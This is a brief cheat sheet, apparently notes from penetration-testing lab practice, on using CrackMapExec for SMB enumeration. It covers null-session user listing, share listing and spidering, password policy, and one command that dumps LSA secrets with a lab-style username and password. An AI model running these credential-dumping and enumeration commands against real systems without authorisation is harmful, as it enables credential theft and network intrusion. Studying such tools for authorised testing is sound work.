installation:

apt install crackmapexec

usage:

smb enum:

crackmapexec smb IP
crackmapexec smb IIP -u '' -p '' --users
  • lists out user accounts and their description fields
crackmapexec --verbose smb 192.168.98.120 -u corpmngr -p "User4&*&*" --lsa
  • dump LSA secrets
crackmapexec smb 10.129.29.43 -u guest -p '' --shares
  • lists out shares and their info much like smbmap
    • need to include dummy uname or will give access denied error :v
crackmapexec smb 10.129.203.121 -u guest -p '' --spider SHARENAME --regex .
  • lists out files and directories in a shared folder

password policy enum:

crackmapexec smb IP -u '' -p '' --pass-pol